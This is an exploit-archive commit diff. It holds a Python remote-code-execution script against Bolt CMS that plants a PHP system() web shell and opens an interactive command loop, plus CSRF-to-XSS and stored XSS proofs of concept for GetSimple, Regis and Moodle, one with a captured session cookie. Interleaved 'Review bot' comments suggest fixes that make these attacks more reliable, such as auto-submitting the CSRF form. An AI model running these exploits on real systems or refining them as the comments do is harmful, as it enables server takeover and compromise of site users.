DB: 2021-03-27

4 changes to exploits/shellcodes

GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS
Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS
Moodle 3.10.3 - 'label' Persistent Cross Site Scripting
This commit is contained in:
Offensive Security 2021-03-27 05:01:53 +00:00
parent 06a83531de
commit 95de3ffa84
5 changed files with 159 additions and 86 deletions


@ -7,11 +7,6 @@
# Tested on: Linux # Tested on: Linux
# CVE : not-yet-0day # CVE : not-yet-0day
# last version
# p0c
#!/usr/bin/python #!/usr/bin/python
import requests import requests
@ -20,37 +15,26 @@ import warnings
import re import re
import os import os
from bs4 import BeautifulSoup from bs4 import BeautifulSoup
from colorama import init from colorama import init
from termcolor import colored from termcolor import colored
init() init()
#pip install -r requirements.txt
print(colored(''' print(colored('''
Pre Auth rce with low credintanl Pre Auth rce with low credintanl
By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) #Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))
@ -65,8 +49,7 @@ password = sys.argv[3]
request = requests.session() request = requests.session()
print((colored("[+] Retrieving CSRF token to submit the login print((colored("[+] Retrieving CSRF token to submit the login form","green")))
form","green")))
page = request.get(url+"/bolt/login") page = request.get(url+"/bolt/login")
html_content = page.text html_content = page.text
soup = BeautifulSoup(html_content, 'html.parser') soup = BeautifulSoup(html_content, 'html.parser')
@ -87,15 +70,15 @@ print((colored("[+] Login token is : {0}","green")).format(token))
aaa = request.get(url+"/bolt/profile") aaa = request.get(url+"/bolt/profile")
soup0 = BeautifulSoup(aaa.content, 'html.parser') soup0 = BeautifulSoup(aaa.content, 'html.parser')
token0 = soup0.findAll('input')[6].get("value") token0 = soup0.findAll('input')[6].get("value")
data_profile = { data_profile = {
"user_profile[password][first]":"password", "user_profile[password][first]":"password",
"user_profile[password][second]":"password", "user_profile[password][second]":"password",
"user_profile[email]":"a@a.com", "user_profile[email]":"a@a.com",
"user_profile[displayname]":"<?php system($_GET['test']);?>", "user_profile[displayname]":"<?php system($_GET['test']);?>",
"user_profile[save]":"", "user_profile[save]":"",
"user_profile[_token]":token0 "user_profile[_token]":token0
} }
profile = request.post(url+'/bolt/profile',data_profile) profile = request.post(url+'/bolt/profile',data_profile)
@ -113,55 +96,49 @@ tables = soup2.find_all('span', class_ = 'entry disabled')
print((colored("[+] SESSION INJECTION ","green"))) print((colored("[+] SESSION INJECTION ","green")))
for all_tables in tables: for all_tables in tables:
f= open("session.txt","a+") f= open("session.txt","a+")
f.write(all_tables.text+"\n") f.write(all_tables.text+"\n")
f.close() f.close()
num_lines = sum(1 for line in open('session.txt')) num_lines = sum(1 for line in open('session.txt'))
renamePostData = { renamePostData = {
"namespace": "root", "namespace": "root",
"parent": "/app/cache/.sessions", "parent": "/app/cache/.sessions",
"oldname": all_tables.text, "oldname": all_tables.text,
"newname": "../../../public/files/test{}.php".format(num_lines), "newname": "../../../public/files/test{}.php".format(num_lines),
"token": csrf "token": csrf
} }
rename = request.post(url+"/async/folder/rename", renamePostData) rename = request.post(url+"/async/folder/rename", renamePostData)
try:
url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)
try: rev = requests.get(url1).text
url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) r1 = re.findall('php',rev)
rev = requests.get(url1).text r2 = r1[0]
r1 = re.findall('php',rev) if r2 == "php" :
fileINJ = "test{}".format(num_lines)
r2 = r1[0]
if r2 == "php" : print((colored("[+] FOUND : "+fileINJ,"green")))
fileINJ = "test{}".format(num_lines)
except IndexError:
print((colored("[+] FOUND : "+fileINJ,"green"))) print((colored("[-] Not found.","red")))
except IndexError:
print((colored("[-] Not found.","red")))
new_name = 0 new_name = 0
while new_name != 'quit': while new_name != 'quit':
inputs = input(colored("Enter OS command , for exit 'quit' : inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red"))
","green","on_red")) if inputs == "quit" :
if inputs == "quit" : exit()
exit() else:
else: a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) aa = a.text
aa = a.text r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
print((r11)[0]) print((r11)[0])
Greetz to : all my friends
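Review bot: In the re-indented try/except at the end of the hunk, `fileINJ` is only bound inside the `if r2 == "php"` branch, so on the `except IndexError` path the script prints "Not found." and then falls straight into the command loop, where `"/files/{}.php?test={}".format(fileINJ,inputs)` raises NameError; binding `fileINJ = None` before the `try` and calling `exit()` after the "Not found." print gives a clean failure instead. The success check itself is weak: `re.findall('php',rev)` matches any response that merely contains the substring "php" (an error page can), so a failed rename can still be reported as `[+] FOUND`; checking for the expected directory-listing output would be more reliable. The loop also interpolates the operator's command unencoded into the query string, so input containing `&`, `#`, `+` or `%` is truncated or mangled before it reaches `system()`; `requests.get(url+"/files/{}.php".format(fileINJ), params={"test": inputs})` lets requests encode it. The closing `print((r11)[0])` raises IndexError whenever the displayname regex finds nothing, e.g. for a command with empty output, and none of the `requests.get` calls in this hunk set a `timeout`. The script's session and CSRF setup lives above this hunk, outside the visible lines.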

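--- /dev/null
+++ b/exploits/php/webapps/49712.html
@@ -0,0 +1,21 @@
+# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS
+# Exploit Author: Abhishek Joshi
+# Date: March 25, 2021
+# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download
+# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip
+# Version: 0.1
+# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10
+# Tested against: Firefox 78.7.0esr (64-bit)
+# Vulnerability Description:
+# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site.
+## CSRF POST Form Method
+<html><body>
+<form action="http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin" method="POST">
+<input type="hidden" name="customjs_url_content" value="">
+<input type="hidden" name="customjs_js_content" value="alert('Hello Abhishek Joshi from CSRF --> XSS all the things!')">
+<input type="hidden" name="submit" value="Save Settings">
+<input type="submit" value="Submit request">
+</form>
+</body></html>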
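Review bot: The PoC form only fires when the victim presses the "Submit request" button, whereas the description claims the injection happens "when an authenticated admin visiting a third-party site"; adding `<script>document.forms[0].submit();</script>` before `</body>` makes the page self-submitting so that the visit alone triggers it, which is what the described impact requires. The `action` is hard-wired to `http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin`, so a header line such as `# Note: replace mygetsimplecms.local with the target host` would help. It would also be worth stating explicitly that the plugin's settings handler accepts this POST with no anti-CSRF token (the form carries none), since that is the root cause the advisory relies on — the PoC implies it but does not say so.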

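--- /dev/null
+++ b/exploits/php/webapps/49713.txt
@@ -0,0 +1,22 @@
+# Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS
+# Exploit Author: George Tsimpidas
+# Date: 2021-03-25
+# Vendor Homepage: www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip
+# Version : 1.0.0
+# Tested on: Kali Linux 2020.4
+# Category: Webapp
+# Description
+Regis Inventory And Monitoring System, suffers from a stored cross site scripting on Item's List Category
+#PoC
+1. Login as admin : http://localhost/regis_inventory/index.php
+2. Visit : http://localhost/regis_inventory/item.php
+3. Click add a New Item and input your payload on "Generic Name" textbox.
+Payload : <script>alert("XSS")</script>
+4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up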
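Review bot: The title and description locate the stored XSS in the 'Item List' Category, but PoC step 3 puts the payload into the "Generic Name" textbox of the add-item form; the advisory should name one field consistently, or list both if both are affected, e.g. `# Description: stored XSS via the "Generic Name" field of Add New Item (item.php), rendered in the Item List`. Step 1 requires logging in as admin, so this is an authenticated stored XSS; stating which lower-privileged roles (if any) can add items would tell the reader whether it is more than self-XSS for the administrator — that cannot be determined from the text as written. The `# Version : 1.0.0` line also disagrees with the `1.0` in the title.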

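--- /dev/null
+++ b/exploits/php/webapps/49714.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting
+# Date: 25.03.2021
+# Author: Vincent666 ibn Winnie
+# Software Link: https://moodle.org/
+# Tested on: Windows 10
+# Web Browser: Mozilla Firefox
+# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month
+Choose a role : Student (example)
+Open calendar :
+https://school.localhost/calendar/view.php?view=month
+Create new event:
+Example:
+Event Title "Test"
+Description :Choose Insert Video File and choose Video:
+Video Source Url you can paste video link from youtube
+And open Subtitles and Captions:
+Subtitle track URL use video link from youtube
+Field Label : There is we can use xss code:
+<img src="1" onerror="alert(1)" />
+or try in base64
+<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+"
+type="image/svg+xml" AllowScriptAccess="always"></embed>
+Insert Media and save this.
+Open event and get stored xss.
+POST:
+https://school.localhost/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form
+Host: school.localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/json
+X-Requested-With: XMLHttpRequest
+Content-Length: 996
+Origin: https://school.localhost
+Connection: keep-alive
+Referer: https://school.localhost/calendar/view.php?view=month
+Cookie: MoodleSession=4ea0036558425526decc096ed375b886;
+EU_COOKIE_LAW_CONSENT=true
+[{"index":0,"methodname":"core_calendar_submit_create_update_form","args":{"formdata":"id=0&userid=56&modulename=&instance=0&visible=1&eventtype=user&sesskey=vCHlHS7oIl&_qf__core_calendar_local_event_forms_create=1&mform_showmore_id_general=1&name=test&timestart%5Bday%5D=25&timestart%5Bmonth%5D=3&timestart%5Byear%5D=2021&timestart%5Bhour%5D=10&timestart%5Bminute%5D=4&description%5Btext%5D=%3Cp%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%3E%26nbsp%3B%3Cvideo%20controls%3D%22true%22%3E%3Csource%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%3E%3Ctrack%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%20kind%3D%22subtitles%22%20srclang%3D%22en%22%20label%3D%22%3Cimg%20src%3D%26quot%3B1%26quot%3B%20onerror%3D%26quot%3Balert(1)%26quot%3B%20%2F%3E%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%3C%2Fvideo%3E%26nbsp%3B%3Cbr%3E%3C%2Fp%3E&description%5Bformat%5D=1&description%5Bitemid%5D=495874277&location=&duration=0"}}]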
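Review bot: The captured POST embeds live session material from the test instance — `sesskey=vCHlHS7oIl` in both the URL and the form body, and `Cookie: MoodleSession=4ea0036558425526decc096ed375b886` — which should be replaced with placeholders such as `<SESSKEY>` and `<SESSION>` before publication; readers who paste the request verbatim will otherwise only get a sesskey error, and publishing real tokens is bad practice even from a lab host. The body shows `eventtype=user` and `userid=56`, i.e. a personal calendar event created by the Student role, and the write-up never says who else sees the rendered `label` of the `<track>` element; it should state whether this reaches other users (course or site events) or is self-XSS only, which cannot be determined from the text. Decoding the base64 in the `<embed>` payload gives `<script>alert("XSS");</script>`, worth noting beside it so the reader knows what the second payload does. The `# Google Dorks` line invites scanning unrelated Moodle sites and adds nothing to reproduction.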


@ -43892,4 +43892,7 @@ id,file,description,date,author,type,platform,port
49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware, 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware,
49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware, 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware,
49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",2021-03-25,"Andrea Gonzalez",webapps,php, 49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",2021-03-25,"Andrea Gonzalez",webapps,php,
49712,exploits/php/webapps/49712.html,"GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS",2021-03-26,"Abhishek Joshi",webapps,php,
49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS",2021-03-26,"George Tsimpidas",webapps,php,
49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",2021-03-26,Vincent666,webapps,php,
49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php, 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,
